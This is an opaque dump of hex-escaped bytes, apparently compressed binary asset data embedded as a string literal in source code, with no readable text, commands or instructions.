\x60\\\n\\x20\\x55\\x69\\x14\\x01\\xe0\\x81\\x07\\x1e\\x20\\x6a\\xf8\\xae\\xa9\\xa9\\xc1\\\n\\xf4\\x13\\xdf\\x29\\x5a\\xc6\\xd7\\x7d\\x2f\\x61\\xe5\\xca\\x95\\x0c\\x40\\x1a\\\n\\x20\\xe4\\xc8\\x8d\\x13\\x5d\\x06\\x91\\xb6\\x34\\x8a\\x5f\\x2d\\xdc\\x45\\x34\\\n\\x7f\\x8b\\x4e\\xa7\\xc3\\xe9\\xd3\\xa7\\x15\\x2f\\x67\\xee\\xd5\\xcf\\x88\\x9a\\\n\\x16\\xbc\\x19\\x40\\xa5\\x22\\xe1\\x90\\x40\\x0c\\x0b\\x0b\\xc3\\x87\\x8f\\xd2\\\n\\xf3\\x52\\xeb\\x1e\\x7e\\x19\\x89\\x89\\x89\\xc4\\xae\\x1f\\x18\\x18\\x48\\x45\\\n\\x62\\xe1\\x55\\xa7\\xdf\\x43\\x41\\x41\\x81\\x6a\\xe1\\x33\\x3c\\xb9\\x89\\xf7\\\n\\x4d\\xf9\\x9b\\x96\\x36\\x00\\x69\\x80\\x70\\x50\\x20\\x1a\\x8d\\x46\\x1c\\x98\\\n\\xf3\\x13\\x35\\x2f\\xf8\\x9d\\x7b\\x5e\\x24\\xda\\x65\\x0b\\x0e\\x0e\\xa6\\xc2\\\n\\xf0\\xfd\\x6c\\xcd\\xdb\\xd8\\xb7\\x6f\\x9f\\xea\\x00\\xd4\\xbf\\xb0\\xcf\\xa7\\\n\\x4d\\xe3\\x37\\x89\\xeb\\x68\\x5f\\x01\\xfb\\x22\\x3c\\x35\\x00\\xd2\\x02\\xe1\\\n\\xa0\\x40\\x4c\\x48\\x48\\xa0\\xca\\x67\\xfa\\xda\\xc8\\xdf\\x11\\xed\\xb2\\xd1\\\n\\x62\\xf8\\x8e\\x3d\\xb0\\x93\\xa8\\x69\\x81\\x44\\xf7\\xd3\\x1c\\x60\\x88\\x31\\\n\\x8f\\x99\\x94\\x6e\\xd5\\xea\\xd3\\x21\\x93\\x0b\\x46\\x8d\\x10\\x0e\\x0
a\\xc4\\\n\\x15\\x2b\\x56\\x60\\xf3\\xb0\\x63\\xd4\\x14\\x60\\xd3\\xf5\\xb9\\x44\\xbb\\x6c\\\n\\xe1\\xe1\\xe1\\xa8\\x5d\\x91\\xa1\\x78\\x39\\x67\\xbc\\x9a\\x41\\xd5\\xa1\\x3f\\\n\\x03\\x8e\\xff\\x38\\x2e\\xcd\\xaa\\x0b\\x78\\xca\\xa6\\xf1\\x0b\\x01\\x81\\x83\\\n\\x71\\x3d\\x09\\xc2\\x41\\x81\\x98\\x99\\x99\\x89\\xd5\\x96\\xbf\\x53\\x53\\x80\\\n\\x97\\x9a\\xa7\\x10\\xdd\\x1a\\x14\\x1f\\x1f\\x8f\\x8a\\xc5\\xab\\x15\\x2f\\xe7\\\n\\xb8\\x2d\\xab\\xa8\\xf6\\x99\\xf6\\x31\\x01\\xe3\\x0b\\x22\\xf3\\x8b\\x9e\\x07\\\n\\x61\\x2f\\x10\\x35\\xa9\\x15\\x03\\x82\\x98\\x9f\\x9f\\x4f\\x95\\xcf\\x74\\xd9\\\n\\xd9\\x20\\xa2\\x5d\\xb6\\xa5\\x4b\\x97\\x52\\x61\\xf8\\x36\\x6c\\x5c\\x46\\x65\\\n\\x1a\\x45\\x1a\\x67\\x40\\xd5\\x06\\x61\\x37\\x10\\x45\\x51\\xfc\\x4d\\xc0\\xef\\\n\\x5f\\x0b\\xd0\\xad\\x3b\\xd4\\xaf\\x99\\x96\\x46\\x9f\\x29\\xc9\\xad\\x41\\xc9\\\n\\xc9\\xc9\\xd8\\x35\\x3d\\x5e\\xf9\\x06\\xf4\\x87\\xf9\\x54\\xf9\\x4c\\xd5\\x06\\\n\\xe0\\x60\\x20\\xb4\\x3a\\x7e\\x64\\x03\\x51\\xe4\\xf9\\xf4\\x9b\\x81\\x63\\x37\\\n\\xb4\\x0b\\x9a\\x01\\xd3\\x2a\\x56\\x54\\x54\\x60\\xc2\\xc1\\x17\\xa9\\xa9\\xdc\\\n\\x79\\xef\\xb4\\x12\\xed\\xb2\\x65\\x64\\x64\\x50\\x61\\xf8\\x7e\\xe0\\x81\\x07\\\n\\xa8\\xf0\\x99\\xaa\\x11\\x40\\xb7\\x20\\x14\\x00\\x1b\\x80\\xa3\\x00\\x8e\\xc9\\\n\\x09\\xa2\\xc8\\xf1\\x91\\x22\\xcf\\xa7\\xc2\\x85\\xb4\\x8a\\x82\\x20\\xa0\\xbe\\\n\\xbe\\xde\\xab\\x7c\\xa6\\x34\\x18\\xbe\\x6b\\xa7\\x8c\\x54\\xdc\\x67\\xaa\\x56\\\n\\x00\\xdd\\x82\\xb0\\x2d\\xd7\\x68\\xe5\\xec\\x00\\x1e\\x85\\x1d\\x48\\x39\\x9f\\\n\\xd1\\xe5\\xb4\\x8a\\x7a\\xbd\\x1e\\xdf\\xec\\xa5\\x2b\\x8b\\x18\\x69\\x9f\\x69\\\n\\x71\\x71\\xb1\\xe2\\x19\\xbe\\xcb\\xee\\xb6\\x12\\x35\\x2d\\x78\\x2a\\x80\\x6e\\\n\\x77\\x47\\x39\\x7b\\x04\\xb4\\xc8\\x18\\x09\\xfb\\x1c\\x27\\x0e\\x04\\xa2\\xc1\\\n\\x60\\xa0\\x2a\\x8d\\x22\\x60\\x77\\xfa\\x90\\xf4\\x99\\x96\\x97\\x97\\x23\\xe2\\\n\\xec\\x65\\x45\\xcb\\x58\\xc4\\x35\\xcb\\x7e\\x5c\\x37\\x85\\x00\\xba\\x3d\\x64\\\n\\x73\\x0b\\x42\\x1f\\xab\\xc5\\xc6\\x5b\\x2d\\x9f\\x70\\xa2\\xed\\x13\\x99\\xa3\\\n\\xa1\\xdb\\x20\\x86\\x86\\x86\\x52\\xe5\\x33\\x6d\\x5a\\xba\\x87\\xa8\\xcf\\xd4\\\n\\xd9\\x15\\x3f\\x75\\xe5\\x86\\xa2\\xe5\\xcc\\x6a\\xfe\\x87\\x2c\\x3e\\x53\\x4a\\\n\\x6d\\x68\\x56\\xc7\\x70\\xed\\xa8\\xe0\\x06\\x1f\\x6e\\x41\\x68\\xde\\x1e\\x67\\\n\\xd5\\x5d\\xfd\\xfe\\x18\\x44\\x59\\xc7\\x85\\x83\\x06\\xd1\\xdb\\x7c\\xa6\\x7a\\\n\\xbd\\x1e\\x53\\xdf\\xfe\\x48\\xf1\\x72\\xae\\x3a\\xfd\\x1e\\xd1\\xe4\\x58\\x14\\\n\\xdb\\xd0\\x2c\\x00\\xaa\\x39\\xe0\\x58\\x9b\\x1b\\x87\\x84\\xba\\xbd\\x44\\xd1\\\n\\x16\\xf8\\x8b\\x36\\x91\\xe7\\x6f\\x2a\\x08\\xa1\\x5b\\x20\\x7a\\x9b\\xcf\\xd4\\\n\\x60\\x30\\x50\\x61\\xf8\\x4e\\xfc\\xe0\\x35\\x22\\xc9\\xb1\\x28\\xb6\\xa1\\x59\\\n\\x00\\x54\\x03\\xa8\\x12\\xec\\xff\\x0e\\x62\\x10\\xf2\\xbc\\xe0\\x9c\\x25\\xad\\\n\\x86\\x9b\\x37\\x53\\x0a\\xc4\\x84\\x84\\x04\\xfc\\x69\\xc2\\x79\\x6a\\x40\\x7c\\\n\\x6d\\xe4\\xef\\x88\\xa6\\xa0\\x0f\\x0e\\x0e\\xa6\\xc2\\x67\\x1a\\xf3\\xd6\\x36\\\n\\x49\\x4d\\x0b\\x14\\xdb\\xd0\\x2c\\x00\\x2a\\x01\\x6c\\xe3\\x81\\x6a\\x77\\x8f\\\n\\x93\\x77\\x3f\\x12\\xe6\\x1a\\xad\\xbc\\x1d\\xc0\\x6d\\x8e\\x1b\\xab\\x02\\xc4\\\n\\xe4\\xe4\\x64\\x6c\\x35\\x7c\\x4a\\x0d\\x88\\x3b\\xf8\\xc7\\x88\\xa6\\xa0\\x0f\\\n\\x0f\\x0f\\xc7\\xe7\\x6b\\xb6\\x29\\x5e\\xce\\x19\\xaf\\x66\\x48\\x72\\xfa\\x16\\\n\\xc5\\x36\\xb4\\xae\\x00\\x56\\x0e\\xe6\\x18\\x79\\x97\\xcf\\xac\\x77\\xa1\\x52\\\n\\x34\\x6a\\xa8\\x88\\xb5\\x6b\\xd7\\x62\\xa7\\xe6\\x09\\x6a\\x60\\xdc\\x3b\\xa5\\\n\\x99\\xe8\\xb9\\x17\\xa5\\xa5\\xa5\\x88\\x79\\x4b\\x79\\x18\\x5b\\x0b\\xf6\\x23\\\n\\x38\\x38\\xd8\\
x13\\xda\\x9a\\xa4\\x00\\x0e\\x09\\x42\\x9a\\x41\\xe4\\x80\\x6a\\\n\\x1f\\xc0\\x72\\xbb\\xc1\\x71\\x52\\x52\\x12\\xde\\x1c\\xb3\\x9c\\x1a\\x10\\xdf\\\n\\x8d\\x36\\x23\\x3e\\x9e\\x9c\\x05\\xad\\xa8\\xa8\\x08\\x89\\x1f\\xbc\\xa6\\x78\\\n\\x39\\x6d\\xff\\xf9\\x2e\\x0c\\x06\\x03\\x03\\x50\\x4a\\x08\\x29\\x05\\xb1\\xda\\\n\\x39\\x40\\xe6\\x81\\xea\\xdb\\x55\\x4e\\x5c\\x5c\\x1c\\x2a\\xa6\\xae\\xa7\\x06\\\n\\xc4\\xaa\\x05\\x5a\\xa2\\x4b\\x18\\x39\\x39\\x39\\x78\\xf1\\x94\\xf2\\xe7\\x4d\\\n\\xe8\\xde\\x30\\x41\\xaf\\xd7\\x33\\x00\\xa5\\x84\\x90\\xc2\\xca\\xb2\\x76\\x81\\\n\\xb1\\xdf\\x4a\\x9a\\x38\\x71\\x22\\xbe\\x5a\\xb8\\x8b\\x1a\\x10\\xbf\\x58\\x39\\\n\\x16\\xa1\\xa1\\xa1\\xc4\\xae\\xbf\\x76\\xed\\x5a\\x64\\x7e\\x7b\\x5c\\xd9\\xc9\\\n\\x9a\\xc6\\x1b\\xa8\\xaf\\xaf\\x87\\x20\\x08\\x0c\\xc0\\xc1\\x4e\\xcc\\xf4\\xa5\\\n\\x8e\\x5c\\xa3\\x85\\x77\\x3c\\x18\\x05\\x93\\x35\\x2e\\x9f\\x1e\\x4c\\xa3\\xcf\\\n\\xb4\\xa9\\xa9\\x89\\xd8\\xf5\\xf3\\xf3\\xf3\\x15\\xf7\\x99\\x56\\x86\\xfa\\x0f\\\n\\x78\\x08\\xab\\x37\\x01\\x28\\x59\\x24\\xa4\\xb8\\xf2\\x06\\xac\\xb4\\x96\\x96\\\n\\x16\\xdc\\x99\\x7b\\x1a\\x34\\xe9\\xff\\xfd\\xcf\\x70\\x04\\x06\\x06\\x12\\xbb\\\n\\xbe\\xd1\\x68\\xc4\\xfe\\xc0\\x56\\x45\\xcb\\xb8\\xda\\xef\\xde\\x3e\\x37\\x3f\\\n\\x7b\\x1b\\x80\\x92\\x45\\x42\\x4a\\x23\\x22\\xe0\\xc2\\x12\\x86\\xc1\\x60\\xa0\\\n\\x2e\\x9f\\xe9\\xb8\\x7f\\x7b\\x19\\xad\\xad\\xe4\\x20\\x31\\x99\\x4c\\x8a\\xfb\\\n\\x4c\\x77\\xde\\xfc\\xba\\x9b\\xcf\\x94\\xe6\\x6c\\x68\\x24\\x01\\x94\\x3c\\x12\\\n\\xaa\\x39\\x22\\x36\\x34\\x34\\x60\\xea\\x1b\\xff\\xa2\\x06\\xc4\\xf0\\x8f\\x36\\\n\\xe0\\xe4\\xc9\\x93\\xc4\\xae\\xdf\\xda\\xda\\x8a\\xe3\\xf3\\xe7\\x60\\x7a\\xa0\\\n\\xbf\\xa2\\xe5\\xdc\\x3d\\x7b\\x11\\xb2\\xfe\\x19\\xe2\\x23\\xb4\\x5c\\x98\\xd8\\\n\\x3e\\x7a\\x7c\\x94\\x25\\x60\\xd4\\x62\\x00\\x0f\\x7a\\x0b\\x80\\xc4\\x20\\x54\\\n\\x2b\\x88\\x35\\x35\\x35\\x78\\xb0\\xac\\x8d\\x1a\\x10\\x63\\xcf\\x6c\\xc3\\xa1\\\n\\x43\\x87\\x88\\x5d\\xbf\\xa5\\xa5\\x05\\xfc\\x1f\\xe6\\x2b\\x5a\\xc6\\x3b\\xc7\\\n\\xe7\\x68\\x6c\\xa2\\x18\\x2d\\xb4\\xdd\\x58\\x26\\x0a\\x42\\x94\\x4d\\xe3\\xf7\\\n\\x0b\\xd0\\x93\\x8c\\x89\\x38\\x80\\x44\\x21\\xec\\x03\\xc4\\x28\\x07\\x88\\x02\\\n\\xcd\\x95\\x5a\\x5e\\x5e\\x8e\\xf9\\x47\\x74\\xd4\\x80\\xf8\\xcc\\xf7\\xaf\\x13\\\n\\x4d\\x1c\\xd5\\xd4\\xd4\\x04\\xfd\\x9a\\x25\\xca\\x01\\x78\\xab\\x7d\\x38\\x3d\\\n\\xa0\\x34\\xb8\\x60\\x6c\\x00\\xda\\xe1\\xc2\\x0c\\x3b\\xf5\\x10\\x76\\x01\\x31\\\n\\xca\\xd1\\xc5\\x88\\xea\\x02\\x23\\xb5\\x20\\xee\\xd9\\xb3\\x07\\xbf\\x3f\\x17\\\n\\x42\\x0d\\x88\\x2f\\xd9\\xde\\x47\\x5e\\x5e\\x1e\\xb1\\xeb\\x37\\x34\\x34\\x20\\\n\\x28\\x2b\\x59\\x49\\x00\\xa9\\x1a\\xff\\x71\\xa2\\xad\\x16\\x22\\xaa\\x44\\x9e\\\n\\xff\\xb8\\xbf\\xb5\\x66\\xd5\\x40\\x08\\x00\\xda\\x34\\x93\\xd0\\x01\\x68\\x44\\\n\\x3b\\x80\\xaa\\xb0\\xb9\\xe5\\xe4\\xe4\\xe0\\x7f\\x5f\\x8b\\xa0\\x06\\xc4\\xad\\\n\\x86\\x4f\\x91\\x96\\x96\\x46\\x74\\xb2\\x66\\xc6\\xab\\x19\\x5e\\x0f\\x20\\x80\\\n\\x4a\\xde\\xda\\x91\\xaf\\xbb\\xfa\\x5d\\x75\\xc7\\x1d\\x41\\x37\\xcd\\xdb\\xe3\\\n\\x88\\xef\\x16\\x92\\x05\\x42\\x4a\\xc7\\x89\\x9d\\x20\\x0a\\x36\\x6b\\xa5\\x25\\\n\\x2f\\xb6\\x17\\x88\\xb4\\xf9\\x4c\\xff\\x34\\xe1\\x3c\\x92\\x93\\xc9\\x45\\x2c\\\n\\x39\\x7c\\xa6\\xb4\\x03\\xd8\\x5f\\x7b\\xf0\\x08\\x08\\x69\\x05\\xb1\\xbf\\x2f\\\n\\x1f\\xf3\\x99\\x7a\\x17\\x80\\xa4\\xc7\\x7f\\x54\\x40\\x48\\x23\\x88\\x03\\x8d\\\n\\x01\\x8c\\x46\\x23\\x3e\\x9e\\xb9\\x91\\x1a\\x10\\x8f\\x2e\\xd2\\x23\\x22\\x82\\\n\\x5c\\x57\\x39\\x3b\\x3b\\x1b\\xab\\x4e\\xbf\\xc7\\x00\\xf4\\x64\\x08\\x29\\x04\\\n\\x71\\xc0\\xd9\\xb0\\xa9\\x53\\xa7\\xa2\\x2
1\\x2e\\x9f\\x1a\\x10\\xcf\\x3c\\x7b\\\n\\x17\\xc2\\xc2\\xc2\\x88\\x5d\\x3f\\x25\\x25\\x05\\x59\\xcd\\xff\\x60\\x00\\x7a\\\n\\x32\\x84\\x14\\x82\\xd8\\xef\\x4b\\x69\\x6d\\x6d\\xc5\\xf8\\x7b\\x42\\xf1\\x63\\\n\\xd2\\x5e\\x6a\\x40\\xbc\\x98\\x32\\x71\\xd0\\x7b\\xf4\\x5c\\x51\\x62\\x62\\x22\\\n\\x8a\\xb8\\x66\\x06\\x20\\x61\\x29\\x9a\\x06\\x5f\\x4d\\x36\\x37\\xbd\\x5e\\x8f\\\n\\x86\\xb3\\xa7\\x40\\x93\\x42\\x0a\\xbf\\x24\\x7a\\x16\\x44\\x49\\x49\\xc9\\x90\\\n\\xf2\\x99\\xde\\x35\\x6e\\x33\\x03\\x90\\x76\\x08\\xd5\\x06\\x22\\x8d\\x3e\\xd3\\\n\\xb0\\x29\\xd3\\xa9\\xcb\\x67\\x1a\\xf4\\xcb\\x4d\\x42\\xc8\\x88\\xe4\\x00\\x51\\\n\\x14\\x7f\\xc3\\x00\\xa4\\xbc\\x3b\\xaa\\xd6\\xae\\x29\\xf3\\x99\\x0e\\xd8\\xfd\\\n\\x8c\\xe2\\x6c\\xb6\\x87\\xc0\\xe1\\x41\\x91\\xe3\\x23\\x18\\x80\\x12\\x41\\x78\\\n\\x79\\xc9\\x5c\\x01\\x00\\x46\\xee\\x3f\\x66\\x95\\x09\\xc4\\x28\\xd8\\x93\\xf9\\\n\\xf0\\x34\\xbe\\x34\\xda\\x7c\\xa6\\x4f\\x7c\\xb1\\x13\\x65\\x65\\x65\\xc4\\xae\\\n\\xef\\x8a\\xcf\\xb4\\xc7\\xf8\\x8f\\x86\\xf7\\x47\\x3d\\x80\\x2e\\x43\\x78\\x79\\\n\\xc9\\x5c\\x01\\xa2\\x38\\xc7\\x51\\xa1\\xc7\\x47\\x1e\\xa8\\xb5\\x10\\x06\\x91\\\n\\xa6\\x2f\\xe9\\x6d\\x5f\\x5e\\x69\\x69\\x29\\x16\\x1f\\x1f\\x41\\x0d\\x88\\xcf\\\n\\x5d\\xfe\\x0b\\x76\\xef\\xde\\x4d\\xec\\xfa\\xfd\\xf9\\x4c\\x29\\x9e\\x80\\x71\\\n\\x39\\xd3\\x82\\x14\\xba\\xbc\\xd8\\x11\\xac\\x0e\\x1c\\x93\\x36\\xf9\\x6f\\xbb\\\n\\x55\\x44\\xbb\\x4d\\xf4\\xb5\\x8a\\x62\\x34\\x80\\xa8\\xcb\\x8b\\x23\\x88\\x55\\\n\\x70\\x47\\xae\\xd1\\xe2\\x6b\\xb5\\x1c\\xf1\\xbb\\xf2\\xed\\xcb\\x9c\\xcd\\xb6\\\n\\x15\\x14\\xa7\\x55\\x4c\\x48\\x48\\xc0\\xde\\x29\\xcd\\xd4\\x40\\x28\\x47\\x3e\\\n\\xd3\\xe6\\xac\\x22\\x35\\x01\\x68\\x01\\x70\\x04\\xc0\\xcb\\x00\\xb6\\x92\\x07\\\n\\x30\\x42\\x03\\x88\\x73\\x01\\x71\\x8e\\xb3\\xe7\\x28\\x19\\x84\\x25\\xff\\xba\\\n\\x61\\xab\\xbb\\x7c\\xe3\\x94\\x55\\x84\\x1e\\xc0\\x3a\\x00\\x31\\x24\\x41\\x34\\\n\\x6f\\x8f\\xb3\\xfe\\xfc\\xe7\\xe7\\x7e\\xe6\\x38\\xee\\x30\\x28\\xcf\\x6f\\x9a\\\n\\x94\\x94\\x44\\x5d\\x3e\\x53\\x92\\x29\\xe8\\xc3\\xc2\\xc2\\xba\\xe5\\x33\\x55\\\n\\xc1\\x12\\xc4\\x56\\x0e\\xd8\\xaa\\x01\\x8e\\x90\\x02\\xf0\\xf2\\x92\\xb9\\xc2\\\n\\xe5\\xc5\\x11\\x3a\\x00\\x51\\x56\\x51\\x8c\\x6e\\xb7\\x89\\xbe\\xed\\x56\\xd7\\\n\\xe7\\x5a\\x5c\\xea\\x8e\\x56\\x18\\xa7\\xf1\\x5a\\x0e\\x53\\xc6\\x07\\x68\\x37\\\n\\xfa\\xfb\\x08\\xf3\\x01\\xd4\\x38\\xe1\\x20\\xd9\\x35\\xa5\\x70\\xc2\\xe6\\xb6\\\n\\x69\\x15\\x53\\x53\\x53\\xb1\\x83\\x7f\\x8c\\x1a\\x18\\xdf\\x0a\\xbf\\x84\\xa5\\\n\\x4b\\x97\\x12\\xbb\\x7e\\x69\\x69\\x29\\x9e\\x3a\\x3e\\xc2\\xeb\\x97\\x20\\x1c\\\n\\xc1\\xc8\\xb9\\x4b\\x68\\x4e\\xbb\\x4d\\xfc\\xf4\\xe4\\xe5\\x1b\\xdb\\x9e\\xa8\\\n\\x3c\\x7b\\x55\\xd2\\x48\\x78\\x6f\\x80\\x96\\x0f\\xf1\\xf7\\xfd\\xb5\\x0f\\xcf\\\n\\xfd\\x1a\\x5d\\x92\\x28\\x01\\x88\\xb9\\x94\\x18\\x41\\xb4\\xe2\\x29\\x5b\\xc2\\\n\\x70\\x46\\xc4\\x74\\x11\\x48\\xb7\\x00\\x9d\\xa7\\x07\\xe7\\xe5\\xe5\\xe1\\x99\\\n\\xef\\x5f\\xa7\\x06\\xc2\\xa7\\xeb\\x46\\x4b\\x9a\\x82\\xbe\\xa7\\x18\\x80\\x9d\\\n\\x00\\xc6\\x00\\x48\\x87\\xfd\\x60\\x9a\\x68\\x00\\xc2\\x4f\\x16\\xab\\xf4\\x69\\\n\\xf0\\x47\\x68\\x04\\x6e\\xb8\\xc6\\xe7\\x6e\\x2d\\xcf\\x8f\\x81\\x7d\\xd3\\xe5\\\n\\xad\\xee\\x99\\x28\\xfe\\xe6\\x44\\xdc\\x8c\\x80\\x1f\\x12\\x22\\x04\\x2f\\x02\\\n\\x31\\xda\\x51\\xe9\\xdd\\x4e\\x0f\\x2e\\x2e\\x2e\\xc6\\x13\\x5f\\xec\\xa4\\x06\\\n\\xc4\\x47\\x3e\\x00\\xea\\xea\\xea\\x3c\\xbd\\x77\\xa2\\x34\\x80\\xce\\x3a\\xd0\\\n\\x61\\x90\\x1b\\xd6\\x5d\\x82\\x90\\x03\\x07\\xce\\xfe\\xbb\\x5c\\xcf\\xa8\\x20\\\n\\x70\\x5c\\xfa\\xaf\\xfc\\xb5\\x1b\\x7c\\x79\\x44\\x93\\x9e\\xb0\\x51\
\x43\\x5a\\\n\\xc5\\xb2\\xb2\\x32\\xcc\\x3d\\xb6\\x89\\x1a\\x10\\x67\\xed\\xbb\\x82\\xc6\\xc6\\\n\\x46\\x06\\x20\\x59\\x00\\x87\\x54\\x07\\x43\\x5d\\xc3\\xd1\\xf0\\x1c\\x22\\x05\\\n\\x8e\\x4b\\x75\\x84\\xe4\\x18\\x2f\\x02\\xf1\\xb6\\x13\\x36\\x87\\x0f\\x1f\\x46\\\n\\xf0\\xbe\\x15\\xd4\\x80\\x78\\xdf\\xee\\x6f\\x25\\xb1\\xb7\\x31\\x00\\xa5\\x07\\\n\\x50\\x0a\\x08\\x9d\\xd7\\xe8\\x36\\x4e\\xf4\\x76\\x10\\x75\\x3a\\x9d\\x24\\x27\\\n\\x11\\x49\\xa9\\xb0\\x29\\xd3\\x07\\x9d\\x46\\x51\\x9b\\x66\\x12\\x84\\x34\\x93\\\n\\x4e\\x0d\\x00\\x2e\\xbf\\xfc\\x17\\x55\\x01\\x28\\x15\\x84\\xbd\\x1a\\x23\\x03\\\n\\xd1\\xa4\\x19\\x3e\\x7c\\x38\\x9a\\xd6\\x4c\\xa2\\x06\\xc2\\x1f\\x93\\xf6\\x62\\\n\\xce\\x9c\\x39\\x83\\x8a\\x7e\\x16\\x20\\x5a\\xb4\\xf7\\x74\\xd2\\x69\\x06\\xf0\\\n\\xc7\\xf3\\x19\\x96\\xdc\\xab\\x9f\\x11\\x39\\xae\\x9b\\x14\\x80\\x52\\x43\\xa8\\\n\\x34\\x88\\x66\\xb8\\x71\\x4e\\xb8\\x1c\\x20\\x06\\x05\\x05\\xe1\\x8b\\x95\\x63\\\n\\xa9\\x01\\xb1\\x21\\x2e\\x1f\\x46\\xa3\\x71\\x30\\xdd\\xcf\\xae\\xb3\\x7f\\xd4\\\n\\x02\\xe8\\xfc\\x1f\\xab\\x4e\\xbf\\x87\\x82\\x82\\x02\\x55\\x00\\x48\\x02\\x42\\\n\\xa5\\x40\\xdc\\xca\\xd9\\x6c\\x79\\x9c\\x68\\xab\\x01\\x65\\x8b\\xfa\\xa1\\xa1\\\n\\xa1\\x38\\xb9\\x34\\x90\\x1a\\x10\\x3f\\x9e\\xb9\\xd1\\xa5\\xf3\\x10\\xfb\\x18\\\n\\xff\\x0d\\x7a\\xf6\\x4f\\x62\\x59\\x1d\\x1f\\xdc\\x3e\\x01\\x74\\xea\\xd9\\x9a\\\n\\xb7\\xb1\\x6f\\xdf\\x3e\\xea\\x01\\x24\\x05\\xa1\\xec\\x20\\xd2\\x6e\\x73\\x0b\\\n\\x0f\\x0f\\xc7\\x87\\x8f\\xd2\\x33\\x3e\\x7c\\x73\\xcc\\xf2\\x7e\\xed\\x6d\\x94\\\n\\x4f\\xc0\\x74\\xb3\\xa1\\xf5\\x05\\xa0\\x53\\xb1\\x07\\x76\\x0e\\x69\\xad\\x54\\\n\\x0e\\x00\\x49\\x42\\x28\\x2b\\x88\\x6a\\xb0\\xb9\\x19\\x8d\\x46\\x1c\\x98\\xf3\\\n\\x13\\x35\\x20\\xee\\xe0\\x1f\\x43\\x6e\\x6e\\xae\\xda\\x00\\xb4\\xf7\\x7a\\x1c\\\n\\x36\\xb4\\xfe\\x00\\x74\\x6a\\xc6\\xab\\x19\\x83\\x5a\\x2b\\x75\\x98\\x50\\x64\\\n\\xa9\\x07\\x5e\\xae\\xc6\\x08\\x20\\xa6\\x69\\xd1\\xaf\\xb5\\x55\\xb1\\x33\\x88\\\n\\xdd\\xd3\\x92\\x17\\x4b\\xa3\\xbb\\xa6\\x13\\xc4\\x84\\x84\\x04\\xec\\x08\\x3a\\\n\\x4b\\x0d\\x88\\xe9\\x2d\\x33\\xb1\\x67\\xcf\\x1e\\x35\\x01\\xb8\\x8d\\x07\\x2a\\\n\\x2f\\x9d\\xcf\\x30\\x7f\\x7f\\x3e\\xc3\\x65\\x57\\xca\\xb8\\x2d\\xab\\x5c\\x5e\\\n\\x2b\\xfd\\x21\\x21\\x42\\x38\\x11\\x37\\x23\\xc0\\x26\\xe3\\x86\\x64\\x5e\\xc6\\\n\\xc6\\xb8\\xc1\\x62\\x13\\x57\\xf8\\x42\\x9c\\x74\\x7e\\xe1\\x6c\\x62\\x67\\x0d\\\n\\x50\\x6a\\x73\\x5b\\x6f\\x03\\x62\\x84\\x34\\x93\\x6e\\x43\\xf3\\x14\\x61\\xf3\\\n\\xb0\\x63\\xd4\\x80\\xf8\\xfb\\x73\\x21\\x28\\x2f\\x2f\\x57\\x0d\\x80\\xae\\x44\\\n\\xbf\\xbe\\x64\\xd8\\xb8\\x6c\\xc0\\xb5\\xd2\\xcb\\x8b\\x23\\x34\\xbe\\x3c\\xa2\\\n\\x7f\\xe5\\xaf\\xdd\\x20\\x70\\x9c\\x6c\\x33\\xc1\\xbc\\x8c\\x8d\\x31\\x5a\\x27\\\n\\x70\\xe9\\x63\\xfd\\xb5\\xe9\\x23\\x34\\x82\\x37\\x2d\\x61\\xf4\\xf2\\x9b\\x6e\\\n\\xbe\\x3e\\x57\\xf3\\x47\\xf3\\x41\\x6a\\x40\\x5c\\x78\\x44\\xe7\\xd1\\x00\\x76\\\n\\x36\\xf6\\x3f\\xcc\\xc7\\xb5\\x6b\\xd7\\x06\\x1a\\xff\\xa5\\x0b\\x1c\\x97\\xca\\\n\\x73\\x88\\x94\\xab\\x1e\\xe4\\xdc\\xf5\\xec\\xa3\\xe5\\xf9\\x10\\x3f\\x81\\x7f\\\n\\x8a\\x03\\xd2\\xe0\\x5d\\x6b\\x89\\xbd\\xfc\\xa6\\xbb\\x74\\x0b\\x35\\x34\\x18\\\n\\xbe\\x79\\xc0\\x2b\\x00\\x74\\x2a\\x2c\\x2c\\x0c\\xd6\\x1e\\xfe\\xea\\xdb\\xf8\\\n\\x40\\x79\\x19\\xdf\\x81\\xac\\xe2\\x60\\x4f\\x79\\x20\\xcb\\x84\\x0d\\xed\\x7e\\\n\\xd3\\xbf\\x8c\\x59\\xae\\x79\\xe8\\xd3\\x2d\\x0c\\x40\\x99\\x00\\x04\\x80\\x53\\\n\\xb3\\x7f\\x81\\xe8\\xe8\\xe8\\xfe\\x00\\xd4\\x28\\xf0\\x1e\\x94\\x1d\\x2b\\xc1\\\n\\xcb\\xdd\\x35\\x47\\x66\\x6e\\xd4\\x84\\x1d\\x5a\\x2b\\xeb\\x03\\x8c\\x6c\\xac\\\n\\xe2\\x7d\\xc
c\\xd7\\xb5\\xde\\x06\\xa0\\x53\\x65\\x77\\x5b\\x91\\x98\\x98\\x48\\\n\\x05\\x80\\xee\\x42\\x68\\x75\\xfc\\x30\\x10\\x25\\x06\\xf1\\xf3\\xb8\\x7c\\xcd\\\n\\xb0\\xcf\\x3e\\x94\\xe5\\xc6\\xba\\xeb\\x97\\x7c\\xda\\x34\\x7e\\x93\\xb8\\x8e\\\n\\xf6\\x15\\x8e\\xee\\xb1\\x57\\x01\\xe8\\x54\\x11\\xd7\\x4c\\x05\\x80\\x80\\xab\\\n\\x27\\xa2\\x72\\xb0\\x41\\xc4\\x51\\x00\\xc7\\x1c\\x63\\x1b\\x41\\xe2\\xc6\\xe8\\\n\\xec\\x1a\\x10\\xdb\\xa9\\xdf\\x91\\x6b\\xb4\\xf8\\xa4\\x99\\x2a\\xbb\\xf8\\xda\\\n\\x94\\x3e\\x94\\xb2\\xb3\\xec\\x36\\x00\\x37\\x26\\x3f\\x42\\xfc\\xe3\\xc0\\x03\\\n\\x1a\\x73\\x80\\x21\\x5a\\xd0\\xf8\\x2d\\x13\\x05\\x21\\x0a\\x00\\xb5\\xa7\\xe2\\\n\\x92\\x04\\xb0\\x67\\x00\\x50\\xfa\\x23\\xe4\\x52\\x24\\x74\\xa4\\x39\\x3c\\x06\\\n\\xe0\\x28\\xa4\\xf7\\x67\\xca\\x1f\\x11\\x45\\x31\\x57\\x30\\xff\\xfc\\x57\\xde\\\n\\x72\\xf3\\x22\\x80\\x0e\\x5a\\x22\\x22\\x4f\\x76\\x41\\xd8\\x3e\\xfe\\xe3\\xb8\\\n\\x34\\xab\\x2e\\xe0\\x29\\x9b\\xc6\\x2f\\x84\\x12\\x00\\x45\\xd8\\xcf\\x01\\xf1\\\n\\x4a\\x00\\x07\\xd3\\x1d\\xb5\\xc9\\x51\\x31\\xa4\\x41\\xd4\\xfd\\